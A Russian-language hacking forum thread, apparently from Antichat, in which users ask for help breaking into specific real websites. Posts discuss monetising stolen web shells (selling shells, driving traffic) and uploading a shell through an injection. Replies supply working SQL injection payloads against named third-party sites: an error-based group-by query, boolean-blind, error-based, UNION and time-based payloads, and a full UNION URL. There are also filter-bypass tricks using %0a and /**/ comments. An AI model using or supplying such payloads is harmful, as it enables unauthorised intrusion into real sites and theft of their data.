Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    175
    Likes Received:
    8
    Reputations:
    1
    Можно крестик в правом верхнем углу браузера нажать,а далее пуск>выкулючить.
    А по сабжу кури Это
    Помойму там в лимит инекция и ниче ты там не раскрутишь.
     
  2. nicols

    nicols Banned

    Joined:
    20 Aug 2012
    Messages:
    49
    Likes Received:
    1
    Reputations:
    0
    Очень смешно.Я там уже курил и не смог ничего сделать!
    Помогите , я могу кинуть ссылку в ЛС, если кто-то захочет помочь.
     
  3. m00c0w

    m00c0w Banned

    Joined:
    25 Dec 2011
    Messages:
    104
    Likes Received:
    14
    Reputations:
    5
    помочь и сделать- не одно и тоже.
     
  4. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
    Есть большое количество шелов,подскажите как на них заработать?В основном форумы vbulletinбслить базу продать никому не нужно,что можна придумать?Спасибо.
     
  5. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    114
    Likes Received:
    29
    Reputations:
    23
    Биржы ссылок, гонять трафик, просто продавать шеллы и т.д.
    А вообще на ачате была статья про монетизацию шеллов, достаточно было бы воспользоваться поиском:
    http://forum.antichat.ru/thread220472.html
     
  6. skier529

    skier529 New Member

    Joined:
    8 May 2009
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Приветствую.
    Нашел сайт, в котором заполненные поля передаются php-скрипту. А он уже редиректит на обычный html-файл. Сайт совсем простетский, поэтому не думаю, что там есть какие-то проверки на инъекции.
    Пример обращения к php-скрипту:
    http://site.ru/[email protected]&parol=1111111

    Собственно вопрос: как лучше всего воспользоваться php-injection в данном случае? Нужно залить шелл...
     
  7. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    114
    Likes Received:
    29
    Reputations:
    23
    Во-первых, по ващим словам, это SQL инъекция, а не PHP.
    Во-вторых, пока вы не запостите ссылку, никто вам точного ответа не даст.
     
  8. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    175
    Likes Received:
    8
    Reputations:
    1
    UPD
    allow_url_fopen on
    post_max_size 8M
    max_file_uploads 20
    upload_max_filesize 10M

    функцией пыха copy тоже не удается создается файл с размером нормальным ,но открываю ,а там пусто.
    Раньше подобные сервани тоже попадились ,но там все решалось просто бэкдор=>wget .... ,а на винде такая трабла 1 раз.
     
  9. skier529

    skier529 New Member

    Joined:
    8 May 2009
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Запись идет в TXT-файл.
    Пример вот: logins-vk.3dn.ru/video465423567-4583112.html
    По клику на кнопку войти все данные из заполненной формы передаются сюда:
    upmozgoff.ru/log.php

    Сами параметры: email и pass
     
  10. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    114
    Likes Received:
    29
    Reputations:
    23
    Это обычный фэйк, который пишет инфу с введенной формы. Ничего с этим, вы не сделаете
     
  11. romasjanXXL

    romasjanXXL New Member

    Joined:
    5 Jan 2013
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    День добрый. прошу помощи со скулей _http://www.multitoys.com.ua/index.php?productID=1A%00xa7A%3f&ukey=discuss_product кучу всего перепроовал а ничего не выходит. нашел вот это http://www.multitoys.com.ua/php.php только так ничего и не смог сделать . помогите плз
     
  12. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Издеваетесь? Проще простого...Совсем народ оборзел.
    Code:
    http://www.multitoys.com.ua/index.php?productID=1 or 1 group by mid(version(),rand(0)|0) having avg(0)&ukey=discuss_product
     
    2 people like this.
  13. \/IRUS

    \/IRUS Elder - Старейшина

    Joined:
    3 Aug 2012
    Messages:
    379
    Likes Received:
    498
    Reputations:
    37
    Есть скуля с правами ROOT
    Читает любой файл в системе, но INTO OUTFILE не дает из-за Error-Based техники.
    Что можно сделать чтобы порутать данный серв?
     
  14. Artrix

    Artrix New Member

    Joined:
    13 Dec 2012
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    Может для начала залить шелл? Ищи админку.
     
  15. \/IRUS

    \/IRUS Elder - Старейшина

    Joined:
    3 Aug 2012
    Messages:
    379
    Likes Received:
    498
    Reputations:
    37
    ищу :( просто уже вариантов нету
     
  16. LelouchMe

    LelouchMe New Member

    Joined:
    31 May 2012
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    Не пойму как правильно тут составить запрос... Хелп плс...
    http://skyscript.ru/primer/skynews/?act=nov&news_id=1
     
  17. \/IRUS

    \/IRUS Elder - Старейшина

    Joined:
    3 Aug 2012
    Messages:
    379
    Likes Received:
    498
    Reputations:
    37
    Place: GET
    Parameter: news_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: act=nov&news_id=1' AND 9405=9405 AND 'UguU'='UguU

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: act=nov&news_id=1' AND (SELECT 6046 FROM(SELECT COUNT(*),CONCAT(0x3
    a776c743a,(SELECT (CASE WHEN (6046=6046) THEN 1 ELSE 0 END)),0x3a6d616a3a,FLOOR(
    RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'iazZ'='ia
    zZ

    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: act=nov&news_id=-7664' UNION ALL SELECT NULL,CONCAT(0x3a776c743a,0x
    51754e467746706b6e4d,0x3a6d616a3a),NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: act=nov&news_id=1' AND SLEEP(5) AND 'ORSc'='ORSc

    вот так http://skyscript.ru:80/primer/skynews/?act=nov&news_id=-3603%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x3a776c743a%2CIFNULL%28CAST%28version%28%29%20AS%20CHAR%29%2C0x20%29%2C0x3a6d616a3a%29%2CNULL%2CNULL%2CNULL%2CNULL%23

    пробелы ток убери
     
    #21777 \/IRUS, 27 Jan 2013
    Last edited: 27 Jan 2013
  18. ukrpunk

    ukrpunk Member

    Joined:
    31 Oct 2011
    Messages:
    47
    Likes Received:
    14
    Reputations:
    5
    Подскажите, как обойти защиту от инъекций спейсвеба? режет запрос при наличии +from+table_name--
     
  19. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    %0afrom table_name
     
    1 person likes this.
  20. \/IRUS

    \/IRUS Elder - Старейшина

    Joined:
    3 Aug 2012
    Messages:
    379
    Likes Received:
    498
    Reputations:
    37
    попробуй /**/from/**/table_name--
     
Thread Status:
Not open for further replies.